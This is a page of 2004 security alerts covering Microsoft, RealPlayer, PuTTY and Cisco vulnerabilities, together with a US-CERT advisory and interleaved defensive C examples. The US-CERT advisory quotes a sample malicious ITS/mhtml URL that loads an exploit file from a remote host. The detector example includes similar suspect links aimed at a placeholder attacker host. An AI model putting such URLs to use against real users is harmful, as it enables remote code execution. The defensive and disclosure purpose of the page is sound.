
* Multiple Vulnerabilities Can Result in Arbitrary Code Execution
* Buffer Overflow in DMS POP3 Server
* Denial of Service in Kerio Personal Firewall 4.1.1
* Denial of Service (DoS) in Software602's 602LAN SUITE
* Arbitrary Code Execution in PuTTY for Windows
* Arbitrary Code-Execution Vulnerability in RealPlayer
* Denial of Service Vulnerability in Microsoft WebDAV XML Message Handler
* Arbitrary Code-Execution Vulnerability in Microsoft NetDDE Services
* Denial of Service in Windows NT 4.0
* Arbitrary Code-Execution Vulnerability in RealPlayer
* Arbitrary Remote Code Execution in WildTangent Web Driver 4.0 (6/9/04)
* MS04-016 - Vulnerability in DirectPlay Could Allow Denial of Service (839643)
* MS04-017 - Vulnerability in Crystal Reports Web Viewer
* Denial of Service in Internet Explorer 6.0 SP1
* Buffer-Overrun Vulnerability in Check Point VPN-1
* Sasser Worm spreading using LSASS Exploit
* IRS Warns of Phishing Scam
* Vulnerability in Internet Explorer ITS Protocol Handler
* Exploit for Multiple Cisco Vulnerabilities
* Cisco OpenSSL Implementation Vulnerability 3/18/04
* Microsoft Office Security Bulletin Office Security Elevation 3/10/04
* Netsky.D Worm Spreading Rapidly 3/2/04
* New type of Phishing Attack 2/29/04
* Heap Overflow in ISS RealSecure and BlackICE Servers
* Arbitrary Code Execution in Real Player 2/20/04
* Arbitrary Code Execution Check Point 2/20/04
* NetSky Worm Variant Spreading 2/19/04
* WINS Denial of Service 2/17/04
* Microsoft Security Alert 2/10/04
* Ricin Alert DHS 2/9/04
* Buffer Overflow in WinZip
* Multiple Vulnerabilities in Mozilla-based Web Browsers
* JPEG GDI+ Trojan Horses Unleashed
* Buffer Overrun in Microsoft JPEG Processing (GDI+)
* Cisco Security Advisory: Crafted Timed Attack Evades Cisco Security Agent Protections
* Arbitrary Code Execution in Microsoft Virtual PC for Mac
* ImageMap URL Spoof Vulnerability in Internet Explorer
* Denial of Service In Cisco IOS Telnet
* Multiple Vulnerabilities in Cisco Secure Access Control Server
* Local Privilege-Escalation Vulnerability in Serv-U FTP Server
* New Microsoft Patch for IE Fixes 3 Critical Problems
* Arbitrary Code-Execution Vulnerability in Internet Information Server 4.0
* Denial of Service in Microsoft DirectPlay
* Denial of Service in Sygate Secure Enterprise
* Remote-Compromise Vulnerability in Check Point VPN-1 Gateway
* New MyDoom Worm Variant Is Spreading
* Information-Disclosure Vulnerability in FTP GLIDE Client 2.43
* Cross-Site Scripting and Spoofing Vulnerability in Exchange 5.5 SP4 with OWA
* Denial of Service in WinAgents TFTP Server for Windows
* Vulnerability in PNG Processing Could Allow Remote Code Execution
* Vulnerability in the License Logging Service Could Allow Code Execution
* Server Message Block Could Allow Remote Code Execution
* Vulnerability in OLE and COM Could Allow Remote Code Execution
* Arbitrary Code Execution in Microsoft Excel
* Arbitrary Code Execution in Windows
* Denial of Service in Cisco IOS
* Cross-Site Scripting Vulnerability in Cart32
* Arbitrary Code-Execution Vulnerability in Mozilla
* Denial of Service in Cisco IOS
* Privilege-Elevation Vulnerability in Windows POSIX OS Subsystem
* Spoofing Vulnerability in Microsoft Proxy Server 2.0 and Microsoft
* IIS Sites and IE Users Under Attack
* URL Handler Vulnerability in Lotus Notes
* Privilege-Escalation Vulnerability in Microsoft Utility Manager for Windows
* Multiple Vulnerabilities in Internet Explorer 6.0


Security Alert, December 20, 2004

Multiple Vulnerabilities Can Result in Arbitrary Code Execution
   Microsoft announced multiple vulnerabilities that could result in
the execution of arbitrary code on vulnerable systems. The
vulnerabilities affect HyperTerminal, Wordpad, Microsoft Internet
Explorer (IE), DHCP, and WINS. The company has released patches to
correct the problems. For complete details about these
vulnerabilities, read the articles on the Security Administrator Web
site.

Security Alert, November 24, 2004

Buffer Overflow in DMS POP3 Server
   Reed Arvin discovered that a vulnerability exists in Digital
Mapping Systems (DMS) POP3 Server version 1.5.3 build 37 that could
result in the remote execution of arbitrary code on the vulnerable
system. A buffer overflow occurs during the POP3 authentication
process when an overly long username is supplied. The buffer overflow
could let a remote attacker cause the program to execute arbitrary
code. The vendor, DMS, has released a bulletin and patch to address
this vulnerability.
   http://www.windowsitpro.com/article/articleid/44602/44602.html
 

Security Alert, November 17, 2004

Denial of Service in Kerio Personal Firewall 4.1.1
   eEye Digital Security discovered a Denial of Service (DoS)
vulnerability in Kerio Personal Firewall 4.1.1 and earlier versions.
The vulnerability lets a remote attacker render a system inoperative
with one packet. Physical access is required to bring an affected
system out of this frozen state. Kerio Technologies has released a
security advisory regarding this vulnerability and recommends that
affected users immediately upgrade to version 4.12.
   http://www.windowsitpro.com/article/articleid/44505/44505.html
 

Security Alert, November 16, 2004

Denial of Service (DoS) in Software602's 602LAN SUITE
   Luigi Auriemma discovered that multiple Denial of Service (DoS)
vulnerabilities exist in Software602's 602LAN SUITE version
2004.0.04.0909 and earlier versions. Software602 advises users to
upgrade to 602LAN SUITE version 2004.0.04.1104 or later.
   http://www.windowsitpro.com/article/articleid/44506/44506.html
 

Security Alert, November 2, 2004

Arbitrary Code Execution in PuTTY for Windows
   iDEFENSE discovered that a vulnerability in the Telnet/Secure Shell
(SSH) program PuTTY could result in the remote execution of arbitrary
code on the vulnerable system. This vulnerability is a result of
insufficient bounds checking on SSH2_MSG_DEBUG packets. The stringlen
parameter obtains a user-supplied value by reading in an integer from
an offset in the packet data. Signedness problems cause the stringlen
value to be incorrectly checked. The author, Simon Tatham, has
released PuTTY 0.56 to address this vulnerability.
   http://www.windowsitpro.com/article/articleid/44358/44358.html
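The alert above describes a signedness problem in a length check. The following C program is an added illustration of that bug class and is not PuTTY's source: it models only the length check on an SSH string (a 4-byte big-endian length followed by that many bytes), with a hypothetical signed version beside an unsigned one, on two constructed payloads. Function and constant names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Read a 4-byte big-endian unsigned integer, the SSH wire format for a
 * string length. */
static uint32_t get_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Hypothetical vulnerable check (not PuTTY's code): the length is held in a
 * signed int and compared as signed. A length field with its top bit set
 * becomes negative, the "too long" test does not fire, and a copy of
 * (size_t)stringlen bytes would follow. Returns 1 if accepted, 0 if rejected. */
int accepts_length_signed(const unsigned char *payload, size_t payload_len)
{
    if (payload_len < 4)
        return 0;
    int stringlen = (int)get_be32(payload); /* 0xFFFFFFF0 becomes -16 on two's-complement targets */
    int remaining = (int)(payload_len - 4);
    if (stringlen > remaining)              /* -16 > 3 is false, so the check passes */
        return 0;
    return 1;
}

/* Hardened check: keep the length unsigned and bound it by the bytes that
 * actually remain in the packet before anything is copied. */
int accepts_length_unsigned(const unsigned char *payload, size_t payload_len)
{
    if (payload_len < 4)
        return 0;
    uint32_t stringlen = get_be32(payload);
    if (stringlen > payload_len - 4)        /* unsigned compare, no sign flip */
        return 0;
    return 1;
}

/* Constructed sample payloads (not captured traffic): a well-formed 3-byte
 * string, and one whose length field has the top bit set. */
const unsigned char kBenignPayload[] = { 0x00, 0x00, 0x00, 0x03, 'a', 'b', 'c' };
const unsigned char kTopBitPayload[] = { 0xFF, 0xFF, 0xFF, 0xF0, 'a', 'b', 'c' };

int main(void)
{
    printf("benign : signed=%d unsigned=%d\n",
           accepts_length_signed(kBenignPayload, sizeof kBenignPayload),
           accepts_length_unsigned(kBenignPayload, sizeof kBenignPayload));
    printf("top-bit: signed=%d unsigned=%d\n",
           accepts_length_signed(kTopBitPayload, sizeof kTopBitPayload),
           accepts_length_unsigned(kTopBitPayload, sizeof kTopBitPayload));
    return 0;
}
```

The signed version accepts the top-bit payload although only three bytes follow the length field; the unsigned version rejects it. The general lesson is that a length read from the wire should stay in an unsigned type and be compared against the remaining packet size before any copy.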
 

Security Alert, October 28, 2004

Arbitrary Code-Execution Vulnerability in RealPlayer
   eEye Digital Security discovered that a vulnerability in RealPlayer
could result in the remote execution of arbitrary code on the
vulnerable system. When an .rjs file containing a long filename
(larger than about 0x8000 bytes) is opened, either in RealPlayer or
through a Web browser, a stack-based buffer overflow occurs, allowing
an exception-handler record to be overwritten and the Execution
Instruction Point (EIP) to be hijacked. The vendor, RealNetworks, has
released a patch (available via the Check for Update menu item under
Tools on the RealPlayer menu bar) to address this vulnerability.
   http://www.windowsitpro.com/article/articleid/44359/44359.html
 

Security Alert, October 20, 2004

Denial of Service Vulnerability in Microsoft WebDAV XML Message Handler
   Amit Klein and Sanctum discovered that a vulnerability in the WWW
Distributed Authoring and Versioning (WebDAV) XML Message Handler
could result in a Denial of Service (DoS) condition on the vulnerable
system. A potential attacker could exploit this vulnerability by
sending a specially crafted WebDAV request to a server that's running
Microsoft IIS and WebDAV, which could cause WebDAV to consume all
available memory and CPU time on an affected server. The IIS service
would have to be restarted to restore functionality. Microsoft has
released bulletin MS04-030, "Vulnerability in WebDAV XML Message
Handler Could Lead to a Denial of Service (824151)," to address this
vulnerability and recommends that affected users apply the appropriate
patch listed in the bulletin.
   http://www.windowsitpro.com/article/articleid/44228/44228.html

Arbitrary Code-Execution Vulnerability in Microsoft NetDDE Services
   John Heasman of Next Generation Security Software discovered that a
vulnerability in the Network Dynamic Data Exchange (NetDDE) services
could result in the arbitrary execution of code on the vulnerable
system. This vulnerability is a result of an unchecked buffer, and a
potential attacker who successfully exploited the vulnerability could
take complete control of an affected system. Microsoft has released
bulletin MS04-031, "Vulnerability in NetDDE Could Allow Remote Code
Execution (841533)," to address this vulnerability and recommends that
affected users apply the appropriate patch listed in the bulletin.
   http://www.windowsitpro.com/article/articleid/44229/44229.html

Denial of Service in Windows NT 4.0
   BindView discovered that a vulnerability in NT 4.0's remote
procedure call (RPC) runtime library could result in a Denial of
Service (DoS) condition or the leakage of active memory content.
Microsoft has released bulletin MS04-029, "Vulnerability in RPC
Runtime Library Could Allow Information Disclosure and Denial of
Service (873350)," to address this vulnerability and recommends that
affected users apply the appropriate patch listed in the bulletin.
   http://www.windowsitpro.com/article/articleid/44227/44227.html

 

Security Alert, October 12, 2004

Modify Your ASP.NET Applications for Added Security
   Microsoft recently published the article "Programmatically check
for canonicalization issues with ASP.NET" (887459), which recommends
program-code adjustments for applications that use ASP.NET. The
changes will help strengthen overall security to prevent intruders
from gaining access to files that they shouldn't be able to access. In
particular, the article offers code samples that you can use to modify
your applications to filter URLs that contain unexpected characters as
a result of a flaw in ASP.NET's canonicalization routines.
   http://support.microsoft.com/?kbid=887459
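The KB article recommends filtering request paths before they reach the file system. The C program below is an added example written in the spirit of that recommendation, not the article's own ASP.NET code: it refuses a URL-decoded request path that contains a backslash or that is not already in canonical form. The two rules, the function names and the sample paths are this example's choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Rebuild `path` in canonical form into `out` (capacity out_len): collapse
 * repeated slashes, drop "." segments, resolve ".." segments, keep a trailing
 * slash on directory requests. Returns 0 on success, -1 if the path does not
 * start with '/', would climb above the root, or does not fit. */
int canonicalize_path(const char *path, char *out, size_t out_len)
{
    if (path[0] != '/' || out_len < 2)
        return -1;
    char *copy = malloc(strlen(path) + 1);   /* strtok modifies its input */
    if (copy == NULL)
        return -1;
    strcpy(copy, path);

    const char *segs[256];
    int n = 0, rc = 0;
    for (char *seg = strtok(copy, "/"); seg != NULL; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0)
            continue;                          /* "." adds nothing */
        if (strcmp(seg, "..") == 0) {
            if (n == 0) { rc = -1; break; }    /* would climb above the root */
            n--;
            continue;
        }
        if (n == 256) { rc = -1; break; }
        segs[n++] = seg;
    }

    if (rc == 0) {
        size_t used = 0;
        out[used++] = '/';
        for (int i = 0; i < n; i++) {
            size_t len = strlen(segs[i]);
            if (used + len + 3 > out_len) { rc = -1; break; } /* room for '/', segment, '/', NUL */
            if (i > 0)
                out[used++] = '/';
            memcpy(out + used, segs[i], len);
            used += len;
        }
        if (rc == 0) {
            if (n > 0 && path[strlen(path) - 1] == '/')
                out[used++] = '/';             /* "/secure/" stays a directory request */
            out[used] = '\0';
        }
    }
    free(copy);
    return rc;
}

/* Returns 1 if the (already URL-decoded) request path may proceed and 0 if
 * it must be refused. Rule one: no backslash, an unexpected character that
 * an authorization check and the later file lookup need not treat alike.
 * Rule two: the path must already be canonical, so that authorization rules
 * keyed on the canonical path see the same string the file system will. */
int request_path_allowed(const char *path)
{
    char canon[1024];
    if (strchr(path, '\\') != NULL)
        return 0;
    if (canonicalize_path(path, canon, sizeof canon) != 0)
        return 0;
    return strcmp(path, canon) == 0;
}

int main(void)
{
    /* Constructed sample paths, not taken from any real application. */
    const char *samples[] = { "/secure/page.aspx", "/secure\\page.aspx",
                              "/secure/../secure/page.aspx", "/secure//page.aspx" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-32s -> %s\n", samples[i],
               request_path_allowed(samples[i]) ? "allow" : "refuse");
    return 0;
}
```

Refusing every non-canonical form, rather than silently normalizing it, is the point: a request that needs normalizing is one whose authorization check and file lookup could disagree.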

 

Security Alert, October 7, 2004

Arbitrary Code-Execution Vulnerability in RealPlayer
   eEye Digital Security discovered that a vulnerability in RealPlayer
could let a remote attacker reliably overwrite heap memory with
arbitrary data and execute arbitrary code within the user security
context. This specific flaw exists within the pnen3260.dll file that
RealPlayer uses. By specially crafting a malformed .rm movie file
along with a Synchronized Multimedia Integration Language (SMIL) file,
a direct heap overwrite is triggered and reliable code execution is
then possible. RealNetworks has released a patch for this
vulnerability, which is also available via the Updates section of the
affected application.
   http://www.windowsitpro.com/article/articleid/44143/44143.html
 

Security Alert, June 9, 2004

Arbitrary Remote Code Execution in WildTangent Web Driver 4.0
   NGSSoftware discovered that a vulnerability in WildTangent Web
Driver 4.0 could result in arbitrary remote code execution on the
vulnerable system. You could cause a number of buffer overruns within
the WildTangent package, namely within the WTHoster and WebDriver
modules, by using any method that takes a filename as a parameter. You
can obtain more information about this vulnerability on the
discoverer's Web site. WildTangent has released version 4.1, which
isn't vulnerable to this condition.
   http://secadministrator.com/articles/index.cfm?articleid=42871

6/8/04
MS04-016 - Vulnerability in DirectPlay Could Allow Denial of Service (839643)

    - Affected Software:
      - Windows 2000 Service Pack 2
      - Windows 2000 Service Pack 3
      - Windows 2000 Service Pack 4
      - Windows XP and Windows XP Service Pack 1
      - Windows XP 64-Bit Edition Service Pack 1
      - Windows XP 64-Bit Edition Version 2003
      - Windows Server 2003
      - Windows Server 2003 64-Bit Edition
      - DirectX Versions 7.0 and later

    - Review the FAQ section of bulletin MS04-016 for
      information about these operating systems:
      - Microsoft Windows 98
      - Microsoft Windows 98 Second Edition (SE)
      - Microsoft Windows Millennium Edition (ME)

    - Impact: Denial of Service
    - Version Number: 1.0

MS04-017 - Vulnerability in Crystal Reports Web Viewer Could Allow Information Disclosure and Denial of Service (842689)

    - Affected Software:
      - Visual Studio .NET 2003
      - Outlook 2003 with Business Contact Manager
      - Microsoft Business Solutions CRM 1.2

    - Impact: Information Disclosure and Denial of Service
    - Version Number: 1.0

 

Security Alert, May 25, 2004

Denial of Service in Internet Explorer 6.0 SP1
   Mike Mauler discovered that a vulnerability in Internet Explorer
(IE) 6.0 Service Pack 1 (SP1) could result in a Denial of Service
(DoS) condition. By using a malformed HTML page containing JavaScript
code with a specially crafted META tag, a potential attacker could
cause IE to terminate with an access violation. Microsoft hasn't
released a fix or bulletin that addresses this vulnerability.
   http://secadministrator.com/articles/index.cfm?articleid=42733
 

Security Alert, May 14, 2004

Buffer-Overrun Vulnerability in Check Point VPN-1
   A buffer-overrun vulnerability in Check Point VPN products could
let a potential attacker compromise a Check Point VPN-1 gateway. An
Internet Security Association and Key Management Protocol (ISAKMP)
vulnerability has been discovered that affects Check Point VPN-1
products during negotiations of a VPN tunnel. Check Point customers
who don't use remote access VPNs or gateway-to-gateway VPNs or who've
upgraded to current product versions (i.e., VPN-1/FireWall-1 R55
HFA-03, R54 HFA-410, and NG FP3 HFA-325; and VPN-1
SecuRemote/SecureClient R56) aren't affected by this vulnerability.
Check Point has released the bulletin "ISAKMP Vulnerability" to
address this vulnerability and recommends that affected users
immediately apply the appropriate patch listed in the bulletin.
   http://secadministrator.com/articles/index.cfm?articleid=42617

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability in Internet Explorer ITS Protocol Handler

   Original release date: April 8, 2004
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows systems running Internet Explorer

Overview

   A cross-domain scripting vulnerability in Microsoft Internet Explorer
   (IE) could allow an attacker to execute arbitrary code with the
   privileges of the user running IE. The attacker could also read and
   manipulate data on web sites in other domains or zones.

I. Description

   There is a cross-domain scripting vulnerability in the way ITS
   protocol handlers determine the security domain of an HTML component
   stored in a Compiled HTML Help (CHM) file. The HTML Help system
   "...uses the underlying components of Microsoft Internet Explorer to
   display help content. It supports HTML, ActiveX, Java, [and] scripting
   languages (JScript, and Microsoft Visual Basic Scripting Edition)."
   CHM files use the InfoTech Storage (ITS) format to store components
   such as HTML files, graphic files, and ActiveX objects. IE provides
   several protocol handlers that can access ITS files and individual CHM
   components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
   the ability to access parts of MIME Encapsulation of Aggregate HTML
   Documents (MHTML) using the mhtml: protocol handler.

   When IE references an inaccessible or non-existent MHTML file using
   the ITS and mhtml: protocols, the ITS protocol handlers can access a
   CHM file from an alternate source. IE incorrectly treats the CHM file
   as if it were in the same domain as the unavailable MHTML file. Using
   a specially crafted URL, an attacker can cause arbitrary script in a
   CHM file to be executed in a different domain, violating the
   cross-domain security model.

   Any programs that use the WebBrowser ActiveX control or the IE HTML
   rendering engine (MSHTML) may be affected by this vulnerability.
   Internet Explorer, Outlook, and Outlook Express are all examples of
   such programs. Any programs, including other web browsers, that use
   the IE protocol handlers (URL monikers) could function as attack
   vectors. Also, due to the way that IE determines MIME types, HTML and
   CHM files may not have the expected file name extensions (.htm/.html
   and .chm respectively).

   NOTE: Using an alternate web browser may not mitigate this
   vulnerability. It may be possible for a web browser other than IE on a
   Windows system to invoke IE to handle ITS protocol URLs.

   US-CERT is tracking this issue as VU#323070. This reference number
   corresponds to CVE candidate CAN-2004-0380.

II. Impact

   By convincing a victim to view an HTML document such as a web page or
   HTML email message, an attacker could execute script in a different
   security domain than the one containing the attacker's document. By
   causing script to be run in the Local Machine Zone, the attacker could
   execute arbitrary code with the privileges of the user running IE. The
   attacker could also read or modify data in other web sites (including
   reading cookies or content and modifying or creating content).

   Publicly available exploit code exists for this vulnerability. US-CERT
   has monitored incident reports that indicate that this vulnerability
   is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
   BloodHound.Exploit.6 are some examples of malicious code that exploit
   this vulnerability. It is important to note that any arbitrary
   executable payload could be delivered via this vulnerability, and
   different anti-virus vendors may identify malicious code with
   different names.

   A malicious web site or email message may contain HTML similar to the
   following:

     ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html

     (This URL is intentionally modified to avoid detection by
     anti-virus software.)

   In this example, HTML and script in exploit.html will be executed in
   the security context of the Local Machine Zone. It is common practice
   for exploit.html to either contain or download an executable payload
   such as a backdoor, trojan horse, virus, bot, or other malicious code.

   Note that it is possible to encode a URL in an attempt to bypass HTTP
   content inspection or anti-virus software.

III. Solution

   Currently, there is no complete solution for this vulnerability. Until
   a patch is available, consider the workarounds listed below.

   Disable ITS protocol handlers

   Disabling ITS protocol handlers appears to prevent exploitation of
   this vulnerability. Delete or rename the following registry keys:

     HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}

   Disabling these protocol handlers will significantly reduce the
   functionality of the Windows Help system and may have other unintended
   consequences. Plan to undo these changes after patches have been
   tested and installed.

   Follow good Internet security practices

   These recommended security practices will help to reduce exposure to
   attacks and mitigate the impact of cross-domain vulnerabilities.

     * Disable Active scripting and ActiveX controls

       NOTE: Disabling Active scripting and ActiveX controls will not
       prevent the exploitation of this vulnerability.

       Disabling Active scripting and ActiveX controls in the Internet
       and Local Machine Zones may stop certain types of attacks and will
       prevent exploitation of different cross-domain vulnerabilities.

       Disable Active scripting and ActiveX controls in any zones used to
       read HTML email.

       Disabling Active scripting and ActiveX controls in the Local
       Machine Zone will prevent malicious code that requires Active
       scripting and ActiveX controls from running. Changing these
       settings may reduce the functionality of scripts, applets, Windows
       components, or other applications. See Microsoft Knowledge Base
       Article 833633 for detailed information about security settings
       for the Local Machine Zone. Note that Service Pack 2 for Windows
       XP includes these changes.

     * Do not follow unsolicited links

       Do not click on unsolicited URLs received in email, instant
       messages, web forums, or Internet relay chat (IRC) channels.

     * Maintain updated anti-virus software

       Anti-virus software with updated virus definitions may identify
       and prevent some exploit attempts. Variations of exploits or
       attack vectors may not be detected. Do not rely solely on
       anti-virus software to defend against this vulnerability. More
       information about viruses and anti-virus vendors is available on
       the US-CERT Computer Virus Resources page.

Appendix B. References

     * Vulnerability Note VU#323070 -
       <http://www.kb.cert.org/vuls/id/323070>

     * US-CERT Computer Virus Resources -
       <http://www.us-cert.gov/other_sources/viruses.html>

     * CVE CAN-2004-0380 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>

     * Introduction to URL Security Zones -
       <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>

     * About Cross-Frame Scripting and Security -
       <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>

     * MIME Type Determination in Internet Explorer -
       <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>

     * URL Monikers -
       <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>

     * Asynchronous Pluggable Protocols -
       <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>

     * Microsoft HTML Help 1.4 SDK -
       <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>

     * Microsoft Knowledge Base Article 182569 -
       <http://support.microsoft.com/default.aspx?scid=182569>

     * Microsoft Knowledge Base Article 174360 -
       <http://support.microsoft.com/default.aspx?scid=174360>

     * Microsoft Knowledge Base Article 833633 -
       <http://support.microsoft.com/default.aspx?scid=833633>

     * Windows XP Service Pack 2 Technical Preview -
       <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>

     * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
     _________________________________________________________________

   This vulnerability was reported by Thor Larholm.
     _________________________________________________________________

   Feedback can be directed to the author: Art Manion.
     _________________________________________________________________

   Copyright 2004 Carnegie Mellon University.

   Terms of use:

<http://www.us-cert.gov/legal.html>

   Revision History

   April 8, 2004: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
sWme3VvhRbvk9KjNUNyTsbY=
=kL0G
-----END PGP SIGNATURE-----
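Section I of the US-CERT advisory above describes the pattern to look for (an mhtml: reference reached through one of the ITS protocol handlers its:, ms-its:, ms-itss: or mk:@MSITStore:), and Section II notes that a URL may be encoded to get past HTTP content inspection. The C program below is an added detection example, not US-CERT code: it percent-decodes and case-folds a fragment of HTML or e-mail before inspecting it, so that encoding and case tricks inspect the same as the plain form. The scheme list is taken from the advisory; the sample fragments are constructed, and attacker.invalid is a placeholder host.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hex digit value, or -1 for anything else. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode `in` into `out` (capacity out_len) and lower-case it so
 * that "MS-ITS%3Amhtml%3A" and "ms-its:mhtml:" inspect the same way.
 * Malformed escapes are copied through unchanged. Returns bytes written. */
size_t normalize_for_inspection(const char *in, char *out, size_t out_len)
{
    size_t o = 0;
    if (out_len == 0)
        return 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < out_len; i++) {
        int c = (unsigned char)in[i];
        if (c == '%' && hexval((unsigned char)in[i + 1]) >= 0 &&
            hexval((unsigned char)in[i + 2]) >= 0) {
            c = hexval((unsigned char)in[i + 1]) * 16 + hexval((unsigned char)in[i + 2]);
            i += 2;
        }
        out[o++] = (char)tolower(c);
    }
    out[o] = '\0';
    return o;
}

/* Returns 1 if the normalized text contains an ITS handler URL that wraps
 * an mhtml: reference, the combination the advisory describes; 0 otherwise.
 * Requiring "mhtml:" directly after the scheme keeps ordinary CHM help
 * links and words ending in "its:" from matching. */
int contains_its_mhtml(const char *normalized)
{
    static const char *const its_schemes[] = {
        "ms-itss:", "ms-its:", "its:", "mk:@msitstore:"
    };
    for (size_t s = 0; s < sizeof its_schemes / sizeof its_schemes[0]; s++) {
        const char *p = normalized;
        while ((p = strstr(p, its_schemes[s])) != NULL) {
            p += strlen(its_schemes[s]);
            if (strncmp(p, "mhtml:", 6) == 0)
                return 1;
        }
    }
    return 0;
}

/* Normalize, then inspect a raw HTML or e-mail fragment. */
int looks_like_its_mhtml_abuse(const char *raw)
{
    char buf[4096];
    normalize_for_inspection(raw, buf, sizeof buf);
    return contains_its_mhtml(buf);
}

/* Constructed samples, not real captures. */
const char *const kLegitHelpLink =
    "<a href=\"mk:@MSITStore:C:\\Windows\\Help\\sample.chm::/index.htm\">Help</a>";
const char *const kSuspectLink =
    "<a href=\"ms-its:mhtml:file://C:\\missing.mht!http://attacker.invalid/x.chm::/x.htm\">";
const char *const kEncodedSuspectLink =
    "<a href=\"MS-ITS%3Amhtml%3Afile://C:\\missing.mht!http://attacker.invalid/x.chm::/x.htm\">";

int main(void)
{
    printf("legit   : %d\n", looks_like_its_mhtml_abuse(kLegitHelpLink));
    printf("suspect : %d\n", looks_like_its_mhtml_abuse(kSuspectLink));
    printf("encoded : %d\n", looks_like_its_mhtml_abuse(kEncodedSuspectLink));
    return 0;
}
```

The check is deliberately narrow (ITS scheme immediately followed by mhtml:) so that legitimate Help links are not flagged; it is a content-inspection aid and, as the advisory's own workarounds section says, not a substitute for disabling the handlers or patching.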
 
Cisco Security Notice: Exploit for Multiple Cisco Vulnerabilities
Document ID: 50220
Revision 1.0
For Public Release 2004 March 27 19:30 UTC

--------------------------------------------------------------------------------

Summary
Proof-of-concept code has been publicly released by an external group that exploits multiple previous vulnerabilities in various Cisco products.

Details
Proof-of-concept code has been publicly released that exploits multiple previous vulnerabilities in various Cisco products. The following vulnerabilities, listed verbatim from the exploit code, are affected. Included after each is a URL which may be referenced for more information regarding each vulnerability where Cisco has previously released a security advisory or response to address the issue. Customers should take steps to ensure that they have addressed each of these, either via a software upgrade or with workarounds in place as appropriate, in order to mitigate any risk from this new exploit code.

Cisco 677/678 Telnet Buffer Overflow Vulnerability

CBOS - Improving Resilience to Denial-of-Service Attacks

http://www.cisco.com/warp/public/707/CBOS-DoS.shtml

Cisco IOS Router Denial of Service Vulnerability

Cisco IOS HTTP Server Vulnerability

http://www.cisco.com/warp/public/707/ioshttpserver-pub.shtml

Cisco IOS HTTP Auth Vulnerability

IOS HTTP Authorization Vulnerability

http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html

Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

IOS HTTP Authorization Vulnerability

http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html

Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

Cisco Catalyst SSH Protocol Mismatch Vulnerability

http://www.cisco.com/warp/public/707/catalyst-ssh-protocolmismatch-pub.shtml

Cisco 675 Web Administration Denial of Service Vulnerability

Cisco is currently researching this vulnerability further. Mitigation methods have been available for some time such as setting the Web server to listen on a different port:

"Code Red" Worm - Customer Impact

http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml#workarounds

and through bugs resolved in the following advisory where the Web server under Cisco CBOS was enabled by default and listening on port 80 even when the Web server was not configured.

CBOS Web-based Configuration Utility Vulnerability

http://www.cisco.com/warp/public/707/cisco-cbos-webserver-pub.shtml

Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

Catalyst 3500 Issue

Report: http://www.securityfocus.com/archive/1/141471 Cisco Response: http://www.securityfocus.com/archive/1/144655

Cisco IOS Software HTTP Request Denial of Service Vulnerability

Cisco IOS HTTP Server Query Vulnerability

http://www.cisco.com/warp/public/707/ioshttpserverquery-pub.shtml

Cisco 514 UDP Flood Denial of Service Vulnerability

A Vulnerability in IOS Firewall Feature Set

http://www.cisco.com/warp/public/707/IOS-cbac-dynacl-pub.shtml

Workarounds
Possible workarounds for each of the vulnerabilities may be found in the advisories referenced in the Details section.

Status of This Notice: INTERIM
This is an interim notice. Although Cisco cannot guarantee the accuracy of all statements in this notice, all of the facts have been checked to the best of our ability. Cisco does not anticipate issuing updated versions of this notice. Should there be a change in the facts, Cisco may update this notice.

A stand-alone copy or paraphrase of the text of this security notice that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Revision History
Revision 1.0
2004-March-26
Initial public release.

Cisco Security Procedures
Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.


--------------------------------------------------------------------------------


All contents are Copyright © 1992-2004 Cisco Systems, Inc. All rights reserved. Important Notices and Privacy Statement.
--------------------------------------------------------------------------------
Updated: Mar 27, 2004 Document ID: 50220

--------------------------------------------------------------------------------
 

Title: Cisco Security Advisory: Cisco OpenSSL Implementation Vulnerability

URL:
 http://www.cisco.com/en/US/customer/products/products_security_advisory09186a0080207d5f.shtml
(available to registered users)
